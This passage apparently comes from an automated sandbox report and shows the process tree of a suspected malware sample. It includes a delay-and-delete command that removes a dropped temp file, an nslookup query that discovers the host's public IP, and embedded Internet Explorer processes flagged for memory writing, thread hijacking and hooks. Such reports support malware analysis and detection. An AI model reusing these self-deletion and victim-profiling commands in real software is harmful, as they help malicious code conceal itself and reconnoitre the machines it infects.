C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5540.tmp" "c:\Users\Admin\AppData\Local\Temp\grdhpird\CSC2466E12677344EBA2A0F5814DA8915.TMP"5⤵PID:1532
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\BN368C.tmp"2⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2024 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Runs ping.exe
PID:1452
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\9F90.bi1"2⤵PID:1776
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1960
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9F90.bi1"2⤵PID:1272
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:1576 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1576 CREDAT:275457 /prefetch:22⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2028
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1576 CREDAT:865285 /prefetch:22⤵PID:1036
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:1776 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1776 CREDAT:275457 /prefetch:22⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1404
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1776 CREDAT:537610 /prefetch:22⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1060
-